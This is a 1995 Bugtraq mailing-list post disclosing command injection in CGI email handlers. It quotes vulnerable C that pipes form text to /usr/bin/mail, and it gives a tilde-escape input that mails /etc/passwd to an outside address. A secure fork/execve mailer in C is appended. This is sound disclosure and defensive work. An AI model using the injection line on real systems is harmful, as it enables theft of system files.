Bugtraq mailing list archives

More holes, was: Re: SECURITY HOLE: FormMail


From: ivo () nijenrode nl (Ivo)
Date: Sat, 5 Aug 1995 13:53:21 +0200


In message <199508042344.QAA20408 () Csli Stanford EDU> Christian Wettergren writes
| Just to be helpful, the way to do it more safely, without massive
| need for checking is to build a complete mail message, including
| header, and hand that to "sendmail -t" which then reads the recipient
| information out of the constructed header.  [Sendmail should of course
| be an invocation of smail or pp, not the BSD program of that name,
| given the history of problems that has had]

I suspect this still won't take care of emails to pipes or files,
i.e. <|/bin/sh> or </.rhosts>; it is a legitimate, albeit unexpected,
mail-command going to sendmail. So unless these two modes are totally
stripped out of the sendmail, there will exist a vulnerability there,
won't it?

I've written an email-cgi package myself, and for this package I've used
a simple smtp client written by Wietse Venema. I've been familiar with bugs
like tilde-escapes etc. for a while, and this smtp client does not have
any fancy switches, escapes, options etc.

Ok, of course you should not use popen() or system() (C) or open/system (perl)
(at least not without filtering out '|;' etc), but fork combined with
execve works fine and securely.

You can find smtp.c in the wwwutils package at
ftp://ftp.win.tue.nl/pub/infosystems/www/wwwutils.tar.gz
or directly at
ftp://ftp.nijenrode.nl/pub/people/ivo/smtp.c

Also (perhaps someone already reported this), Thomas Boutell's Email Handler
(http://siva.cshl.org/email/index.html)
seems to suffer from this problem. I've reported this a very long time ago
to him, but it seems he hasn't fixed it. Thomas Boutell is maintainer of
the WWW-FAQ, and he refers to his handler in it, so it *might* be that
a lot of people are using it! Here's a piece of code from email.c:

    /* recipient was already checked against the list of allowed users */
    sprintf(buf, "/usr/bin/mail %s", entries[recipientid].val);
    out = popen(buf, "w");
    fprintf(out, "Subject: %s\n", entries[subjectid].val);
    fprintf(out, "Reply-To: %s\n", entries[emailid].val);
    fprintf(out, "Supposedly-From: %s\n", entries[nameid].val);
    fprintf(out, "[This message was sent through the www-email gateway.]\n");
    fprintf(out, "--\n");
    /* the form's message body goes to mail(1) unfiltered, ~-escapes included */
    fprintf(out, "%s\n", entries[contentid].val);
    pclose(out);


The popen() here doesn't seem to be insecure; the CGI first checks the
recipient against a list of users which are defined in a local configfile
(whose location is hardcoded into the source).

However, this program directly sends the entire message to /usr/bin/mail,
including ~-escapes. I've been able to send myself, using this program,
a copy of the passwd file by simply typing
~!/bin/mail ivo () nijenrode nl < /etc/passwd
in the message-entry of the form. This was on AIX 2.3.

Happy hacking,

        Ivo

------------------------------------------------------------------------
Name:     Ivo van der Wijk  | It won't give up it wants me dead
Internet: ivo () nijenrode nl  | this goddamn noise inside my head
Aka:      www () nijenrode nl  |
IRC:      VladDrac          |                                |\|||/|
URL:      http://www.nijenrode.nl/~ivo
------------------------------------------------------------------------
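The fork/execve approach Ivo recommends, written out as an added example (not code from this post, from wwwutils or from email.c): every form field is checked, the complete message is built in memory and handed over a pipe to a sendmail-compatible MTA, with the recipient passed as its own argv element so no shell ever parses it. The mailer path and its -oi option are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#define MAILER "/usr/sbin/sendmail" /* assumption: a sendmail-compatible MTA */

/* Address: first char alphanumeric (so it cannot be taken for a mailer option),
 * then only conservative characters: no blanks, newlines or | ; < > ` etc. */
int safe_address(const char *s)
{
    if (s == NULL || !isalnum((unsigned char)*s) || strlen(s) > 254) return 0;
    for (; *s; s++)
        if (!isalnum((unsigned char)*s) && !strchr("@.-_+", *s)) return 0;
    return 1;
}
/* Free-text header: CR/LF would end the line and let a form field add headers. */
int safe_header_value(const char *s)
{
    return s != NULL && strpbrk(s, "\r\n") == NULL;
}
/* Assemble the whole message in memory; length, or -1 if a field fails a check.
 * The body goes through verbatim: sendmail, unlike /usr/bin/mail, has no ~ escapes. */
int build_message(char *buf, size_t len, const char *to, const char *from,
                  const char *subject, const char *body)
{
    if (!safe_address(to) || !safe_address(from) ||
        !safe_header_value(subject) || body == NULL) return -1;
    int n = snprintf(buf, len, "To: %s\nReply-To: %s\nSubject: %s\n"
                     "[Sent through the www-email gateway.]\n\n%s\n",
                     to, from, subject, body);
    return (n < 0 || (size_t)n >= len) ? -1 : n;
}
/* fork/execve instead of popen: the recipient is its own argv element and the
 * message arrives on stdin, so no shell parses either. Returns the wait status. */
int send_message(const char *to, const char *msg, int len)
{
    int fd[2], status, ok; pid_t pid;
    char *const argv[] = { MAILER, "-oi", (char *)to, NULL }; /* -oi: lone "." is not EOF */
    char *const envp[] = { NULL };
    if (pipe(fd) < 0 || (pid = fork()) < 0) return -1;
    if (pid == 0) {                      /* child: stdin <- pipe, then the mailer */
        dup2(fd[0], 0); close(fd[0]); close(fd[1]);
        execve(MAILER, argv, envp);
        _exit(127);
    }
    close(fd[0]);
    ok = write(fd[1], msg, len) == len;
    close(fd[1]);
    return (waitpid(pid, &status, 0) < 0 || !ok) ? -1 : status;
}
```

Usage: after build_message() returns a length n > 0, call send_message(to, buf, n); a message whose body contains ~! is delivered as plain text because no mail(1) front end ever reads it.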